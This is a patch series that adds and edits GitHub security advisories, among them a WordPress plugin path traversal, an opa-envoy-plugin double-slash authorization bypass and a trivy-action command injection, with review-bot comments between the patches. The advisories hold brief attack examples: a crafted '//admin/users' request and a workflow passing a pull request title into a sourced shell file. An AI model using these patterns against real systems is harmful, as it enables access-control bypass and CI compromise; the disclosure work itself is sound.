"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2653" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65#issuecomment-3804571402" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh" + }, + { + "type": "WEB", + "url": "https://github.com/user-attachments/files/24878279/id.000035.sig.06.src.000550.time.910126.execs.241742.op.havoc.rep.5.zip" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752596" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json new file mode 100644 index 0000000000000..a744ef0b04dbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2w8-j4gc-v26q", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2426" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2426" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/d3470a8971d9043438c8aad281cf37d14fefa208" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-manager.php#L215" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file From 0be8ae264144d278ce4b2506bc750e2337001b9f Mon Sep 17 00:00:00 2001 
From: Maksim Moiseikin Date: Wed, 18 Feb 2026 16:14:41 +0100 Subject: [PATCH 004/174] Improve GHSA-xfhx-r7ww-5995 --- .../GHSA-xfhx-r7ww-5995.json | 28 ++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json index c5bfb830d442c..2911ab16e66df 100644 --- a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json +++ b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xfhx-r7ww-5995", - "modified": "2026-01-15T20:11:41Z", + "modified": "2026-01-15T20:11:51Z", "published": "2026-01-15T15:31:19Z", "aliases": [ "CVE-2026-0897" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 3.13.0" } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.12.0" + } } ], "references": [ @@ -47,6 +69,10 @@ "type": "WEB", "url": "https://github.com/keras-team/keras/pull/21880" }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22081" + }, { "type": "WEB", "url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6" From 4ef3aa115961db820ee061dc512929b90bd4c052 Mon Sep 17 00:00:00 2001 
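Review bot: The added `keras` entry in GHSA-xfhx-r7ww-5995 (`introduced` 3.0.0, `fixed` 3.12.1) only has an effect if the existing entry above it no longer covers the 3.12.x line, and that entry's `ranges` lie outside this hunk. A version counts as affected when it falls inside any listed range, so if the first entry still starts at 3.0.0 and is fixed only in the 3.13 line, 3.12.1 keeps matching and scanners will go on flagging the backported fix. In that case the first entry's start should move to the 3.13 line, presumably `"introduced": "3.13.0"` judging by its `<= 3.13.0` marker. The first hunk also moves `modified` by only ten seconds within 2026-01-15 on a commit dated 2026-02-18, so it is worth confirming that consumers syncing on `modified` will pick up the change.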
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:26:18 +0000 Subject: [PATCH 005/174] Publish Advisories GHSA-9f29-v6mm-pw6w GHSA-9p44-j4g5-cfx5 --- .../GHSA-9f29-v6mm-pw6w.json | 68 +++++++++++++++++++ .../GHSA-9p44-j4g5-cfx5.json | 65 ++++++++++++++++++ 2 files changed, 133 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json diff --git a/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json b/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json new file mode 100644 index 0000000000000..0808e742888aa --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9f29-v6mm-pw6w/GHSA-9f29-v6mm-pw6w.json 
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9f29-v6mm-pw6w",
+ "modified": "2026-02-18T15:25:04Z",
+ "published": "2026-02-18T15:25:04Z",
+ "aliases": [
+ "CVE-2026-26205"
+ ],
+ "summary": "opa-envoy-plugin has a Authorization Bypass via Double-Slash Path Misinterpretation in input.parsed_path",
+ "details": "A security vulnerability has been discovered in how the `input.parsed_path` field is constructed. HTTP request paths are treated as full URIs when parsed; interpreting leading path segments prefixed with double slashes (`//`) as [authority](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2) components, and therefore dropping them from the parsed path. This creates a path interpretation mismatch between authorization policies and backend servers, enabling attackers to bypass access controls by crafting requests where the authorization filter evaluates a different path than the one ultimately served.\n\n#### Attack example\n\n**HTTP request:**\n\n```\nGET //admin/users HTTP/1.1\nHost: example.com\n```\n\n**Policy sees:**\n\nThe leading `//admin` path segment is interpreted as an authority component, and dropped from `input.parsed_path` field:\n\n\n```json\n{\n \"parsed_path\": [\"users\"]\n}\n```\n\n**Backend receives:**\n\n`//admin/users` path, normalized to `/admin/users`.\n\n#### Affected Request Pattern Examples\n\n| Request path | `input.parsed_path` | `input.attributes.request.http.path` | Discrepancy |\n| - | - | - | - |\n| / | [\"\"] | / | ✅ None |\n| //foo | [\"\"] | //foo| ❌ Mismatch |\n| /admin | [\"admin\"] | /admin | ✅ None |\n| /admin/users | [\"admin\", \"users\"] | /admin/users | ✅ None |\n| //admin/users | [\"users\"] | //admin/users | ❌ Mismatch |\n\n### Impact\n\nUsers are impacted if all the following conditions apply:\n\n1. Protected resources are path-hierarchical (e.g., `/admin/users` vs `/users`)\n2. Authorization policies use `input.parsed_path` for path-based decisions\n3. Backend servers apply lenient path normalization\n\n### Patches\n\nGo: `v1.13.2-envoy-2`\nDocker: `1.13.2-envoy-2`, `1.13.2-envoy-2-static`\n\n### Workarounds\n\nUsers who cannot immediately upgrade opa-envoy-plugin are recommended to apply one, or more, of the workarrounds described below.\n\n#### 1. Enable the `merge_slashes` Envoy configuration option\n\nAs per [Envoy best practices](https://www.envoyproxy.io/docs/envoy/v1.37.0/configuration/best_practices/edge.html), enabling the [merge_slashes](https://www.envoyproxy.io/docs/envoy/latest/api-v3/extensions/filters/network/http_connection_manager/v3/http_connection_manager.proto#envoy-v3-api-field-extensions-filters-network-http-connection-manager-v3-httpconnectionmanager-merge-slashes) configuration option in Envoy will remove redundant slashes from the request path before filtering is applied, effectively mitigating the `input.parsed_path` issue described in this advisory.\n\n\n#### 2. Use `input.attributes.request.http.path` instead of `input.parsed_path` in policies\n\nThe `input.attributes.request.http.path` field contains the unprocessed, raw request path. Users are recommended to update any policy using `input.parsed_path` to instead use the `input.attributes.request.http.path` field.\n\n##### Example ####\n\n```rego\npackage example\n\n# Use instead of input.parsed_path\nparsed_path := split( # tokenize into array\n\ttrim_left( # drop leading slashes\n\t\turlquery.decode(input.attributes.request.http.path), # url-decode the path\n\t\t\"/\",\n\t),\n\t\"/\",\n)\n```",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/open-policy-agent/opa-envoy-plugin"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.13.2-envoy-2"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.13.1-envoy"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/open-policy-agent/opa-envoy-plugin/security/advisories/GHSA-9f29-v6mm-pw6w"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open-policy-agent/opa-envoy-plugin/commit/58c44d4ec408d5852d1d0287599e7d5c5e2bc5c3"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/open-policy-agent/opa-envoy-plugin"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/open-policy-agent/opa-envoy-plugin/releases/tag/v1.13.2-envoy-2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T15:25:04Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json b/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json
new file mode 100644
index 0000000000000..7fb49ffd749a1
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-9p44-j4g5-cfx5/GHSA-9p44-j4g5-cfx5.json
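Review bot: In the `details` of GHSA-9f29-v6mm-pw6w, the workaround Rego snippet splits `input.attributes.request.http.path` after `urlquery.decode`, and as far as I know that field still carries the query string in Envoy's ext_authz input. Decoding first also turns an encoded `%2F` into a segment separator. A policy that adopts the snippet verbatim could therefore see a last segment like `users?x=1` (constructed example), or a different segment count than the backend does. The text should say to strip the query first, and to split before decoding where the backend keeps `%2F` literal. Two wording slips in the same record: `workarrounds` should read `workarounds`, and the `summary` should read `an Authorization Bypass`.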
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9p44-j4g5-cfx5",
+ "modified": "2026-02-18T15:24:43Z",
+ "published": "2026-02-18T15:24:43Z",
+ "aliases": [
+ "CVE-2026-26189"
+ ],
+ "summary": "Trivy Action has a script injection via sourced env file in composite action",
+ "details": "Command Injection in aquasecurity/trivy-action via Unsanitized Environment Variable Export\n\n\nA command injection vulnerability exists in `aquasecurity/trivy-action` due to improper handling of action inputs when exporting environment variables. The action writes `export VAR=` lines to `trivy_envs.txt` based on user-supplied inputs and subsequently sources this file in `entrypoint.sh`.\n\nBecause input values are written without appropriate shell escaping, attacker-controlled input containing shell metacharacters (e.g., `$(...)`, backticks, or other command substitution syntax) may be evaluated during the sourcing process. This can result in arbitrary command execution within the GitHub Actions runner context.\n\n**Severity:**\n\nModerate\n\nCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)\n\n**Impact:**\n\nSuccessful exploitation may lead to arbitrary command execution in the CI runner environment.\n\n\n**Affected Versions:**\n\n* Versions >= 0.31.0 and <= 0.33.1\n* Introduced in commit `7aca5ac`\n\n**Affected Conditions:**\n\nThe vulnerability is exploitable when a consuming workflow passes attacker-controlled data into any action input that is written to `trivy_envs.txt`. Access to user input is required by the malicious actor.\n\nA representative exploitation pattern involves incorporating untrusted pull request metadata into an action parameter. For example:\n\n```yaml\n- uses: aquasecurity/trivy-action@0.33.1\n with:\n output: \"trivy-${{ github.event.pull_request.title }}.sarif\"\n```\n\nIf the pull request title contains shell syntax, it may be executed when the generated environment file is sourced.\n\n**Not Affected:**\n\n* Workflows that do not pass attacker-controlled data into `trivy-action` inputs\n* Workflows that upgrade to a patched version that properly escapes shell values or eliminates the `source ./trivy_envs.txt` pattern\n* Workflows where user input is not accessible.\n\n**Call Sites:**\n\n* `action.yaml:188` — `set_env_var_if_provided` writes unescaped `export` lines\n* `entrypoint.sh:9` — sources `./trivy_envs.txt`",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "GitHub Actions",
+ "name": "aquasecurity/trivy-action"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.31.0"
+ },
+ {
+ "fixed": "0.34.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/aquasecurity/trivy-action/security/advisories/GHSA-9p44-j4g5-cfx5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/aquasecurity/trivy-action/commit/7aca5acc9500b463826cc47a47a65ad7d404b045"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/aquasecurity/trivy-action/commit/bc61dc55704e2d5704760f3cdab0d09acf16e4ca"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/aquasecurity/trivy-action"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T15:24:43Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 0a0ba0fbbcef82bb8162806cb464536c5fcecc15 Mon Sep 17 00:00:00 2001
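Review bot: The `details` text of GHSA-9p44-j4g5-cfx5 lists the affected versions (`>= 0.31.0 and <= 0.33.1`) but never names the patched release, which appears only in the structured `fixed` event (`0.34.0`). A line such as `**Patched Versions:** 0.34.0` after the affected-versions list would keep the prose self-contained for readers who see only the rendered text. The two commit references are both typed `WEB`; the text identifies `7aca5ac` as the introducing commit and the other is presumably the fix. Saying which is which in `details` would help anyone auditing SHA-pinned uses of the action.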
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:33:14 +0000 Subject: [PATCH 006/174] Advisory Database Sync --- .../GHSA-65c5-j3wr-v7fh.json | 6 +- .../GHSA-8jj6-9qc9-r5x4.json | 3 +- .../GHSA-25w3-5rm9-v4wm.json | 40 +++++++++++++ .../GHSA-2cpx-h862-rqm6.json | 40 +++++++++++++ .../GHSA-3crm-x896-j73p.json | 36 +++++++++++ .../GHSA-47m2-7g75-xvrp.json | 36 +++++++++++ .../GHSA-49xw-73mm-8fw9.json | 36 +++++++++++ .../GHSA-4m8q-p6h8-x2wj.json | 4 +- .../GHSA-54p7-3rpx-pjfc.json | 48 +++++++++++++++ .../GHSA-568p-hhxc-vvx8.json | 15 +++-- .../GHSA-5fc6-h8m7-2wfc.json | 4 +- .../GHSA-5g82-gg27-r8vp.json | 15 +++-- .../GHSA-5hp8-hwcv-h225.json | 36 +++++++++++ .../GHSA-5rm9-pcp8-m6v8.json | 40 +++++++++++++ .../GHSA-6jg9-x4w8-gj7j.json | 4 +- .../GHSA-6qr6-c44j-c793.json | 60 +++++++++++++++++++ .../GHSA-74jq-6q38-p5wf.json | 4 +- .../GHSA-77vx-jc7r-586m.json | 37 ++++++++++++ .../GHSA-787p-86v4-hhfg.json | 33 ++++++++++ .../GHSA-78p6-wh6m-9r9w.json | 36 +++++++++++ .../GHSA-7jfh-hm8h-m5rq.json | 4 +- .../GHSA-85h6-5m3v-gx37.json | 29 +++++++++ .../GHSA-87ff-rq35-47jj.json | 36 +++++++++++ .../GHSA-8rh3-rvv2-3mr4.json | 4 +- .../GHSA-933h-c422-j33j.json | 40 +++++++++++++ .../GHSA-9379-mwvr-7wxx.json | 40 +++++++++++++ .../GHSA-964f-vc2f-ch6j.json | 15 +++-- .../GHSA-c5gg-v573-hv7f.json | 33 ++++++++++ .../GHSA-cf26-rj67-f4wr.json | 36 +++++++++++ .../GHSA-cw7v-qx8m-563q.json | 36 +++++++++++ .../GHSA-f7cx-4c4g-9g59.json | 36 +++++++++++ .../GHSA-f86v-54pm-58q4.json | 40 +++++++++++++ .../GHSA-ff7j-jwgr-hgxp.json | 36 +++++++++++ .../GHSA-fjxh-qxr5-g7j4.json | 45 ++++++++++++++ .../GHSA-fqmg-pv5x-v55p.json | 40 +++++++++++++ .../GHSA-g5pw-hppv-79r6.json | 37 ++++++++++++ .../GHSA-gcr4-23wm-438x.json | 40 +++++++++++++ .../GHSA-ghfm-hghj-9j75.json | 15 +++-- .../GHSA-h85r-3jrw-9546.json | 37 ++++++++++++ .../GHSA-hr8m-gc74-4f7w.json | 4 +- .../GHSA-hr98-gm7c-926r.json | 37 ++++++++++++ 
.../GHSA-hvjw-vp7g-39h5.json | 40 +++++++++++++ .../GHSA-j9p7-7ww6-3mjx.json | 40 +++++++++++++ .../GHSA-jfq5-qg8x-7rmp.json | 53 ++++++++++++++++ .../GHSA-jxgv-6j54-wwc7.json | 56 +++++++++++++++++ .../GHSA-m8v3-m8mg-rrc7.json | 33 ++++++++++ .../GHSA-mx8g-qc6m-wcmf.json | 33 ++++++++++ .../GHSA-p4q3-g549-vvfc.json | 44 ++++++++++++++ .../GHSA-pc38-57g8-39gg.json | 15 +++-- .../GHSA-phqg-p332-q7vc.json | 45 ++++++++++++++ .../GHSA-q543-x74m-r8q9.json | 4 +- .../GHSA-qq2v-q6qr-p5vx.json | 40 +++++++++++++ .../GHSA-qq7g-427f-cm2r.json | 56 +++++++++++++++++ .../GHSA-r264-whc7-wwfw.json | 33 ++++++++++ .../GHSA-r4m3-cm43-fxrj.json | 48 +++++++++++++++ .../GHSA-r77x-pqm4-6252.json | 36 +++++++++++ .../GHSA-rgjw-pqcr-56gf.json | 36 +++++++++++ .../GHSA-rjm5-gmfm-6cp4.json | 60 +++++++++++++++++++ .../GHSA-rv75-v2gv-p54c.json | 40 +++++++++++++ .../GHSA-rvhp-mghq-8mvw.json | 15 +++-- .../GHSA-vfmw-4jmp-wmrw.json | 36 +++++++++++ .../GHSA-vqcj-rgfw-jjcq.json | 37 ++++++++++++ .../GHSA-vw84-mx3m-hw5p.json | 48 +++++++++++++++ .../GHSA-vwcq-x7gx-g26f.json | 36 +++++++++++ .../GHSA-wfhp-qgm8-5p5c.json | 29 +++++++++ .../GHSA-whmh-gx62-v47m.json | 36 +++++++++++ .../GHSA-wq2g-h2h9-v8x3.json | 36 +++++++++++ .../GHSA-wvvh-pcq5-hc6f.json | 40 +++++++++++++ .../GHSA-ww2j-3p54-3m69.json | 44 ++++++++++++++ .../GHSA-x536-g6fc-g963.json | 36 +++++++++++ 70 files changed, 2244 insertions(+), 34 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json create mode 100644 advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json diff --git a/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json b/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json index 01cd958178615..2238032141356 100644 --- a/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json +++ b/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-65c5-j3wr-v7fh", - "modified": "2025-12-15T12:30:27Z", + "modified": "2026-02-18T15:31:23Z", "published": "2025-12-15T12:30:27Z", "aliases": [ "CVE-2025-14714" ], "details": "An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle\n\n\n\n\nBy executing the bundled interpreter directly the attacker's scripts run with the application's TCC privileges\n\n\n\n\nIn fixed versions parent-constraints are used to allow only the main application to launch interpreter with those permissions\n\nThis issue affects LibreOffice on macOS: from 25.2 before < 25.2.4.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json b/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json index 903dee9e88dfb..0504fcb51c51b 100644 --- a/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json +++ b/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "MODERATE", "github_reviewed": false, 